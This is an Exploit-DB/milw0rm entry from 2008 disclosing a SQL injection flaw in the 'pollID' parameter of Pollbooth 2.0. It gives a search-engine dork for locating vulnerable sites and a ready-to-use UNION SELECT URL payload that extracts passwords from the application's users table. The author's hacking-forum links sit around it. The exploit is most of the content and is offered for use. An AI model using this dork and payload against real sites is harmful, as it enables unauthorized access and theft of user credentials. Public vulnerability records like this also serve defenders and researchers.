Pollbooth <= 2.0 pollID Remote SQL Injection Vulnerability

2008-04-13T00:00:00
ID EDB-ID:5436
Type exploitdb
Reporter S@BUN
Modified 2008-04-13T00:00:00

Description

Pollbooth <= 2.0 (pollID) Remote SQL Injection Vulnerability. Webapps exploit for php platform

                                        
                                            ############################################
#
# Pollbooth v2.0 SQL Injection Vulnerability
#
############################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
##WEBSiTE: http://www.xcorpitx-hack.com/Forum/
####BLOG : http://my.opera.com/SQL-Injection/blog/
####MAiL : hackturkiye.hackturkiye@gmail.com
#
#############################################
#
# DORK 1 : allinurl: "pollBooth.php?op=results"pollID
#
#############################################
EXPLOiT :

pollBooth.php?op=results&pollID=-1+union+select+password,1,2,3+from+users

*********************************************
WEBSiTE&gt;&gt;&gt;http://www.xcorpitx-hack.com/Forum/
*********************************************
********************S@BUN********************
*********************************************

# milw0rm.com [2008-04-13]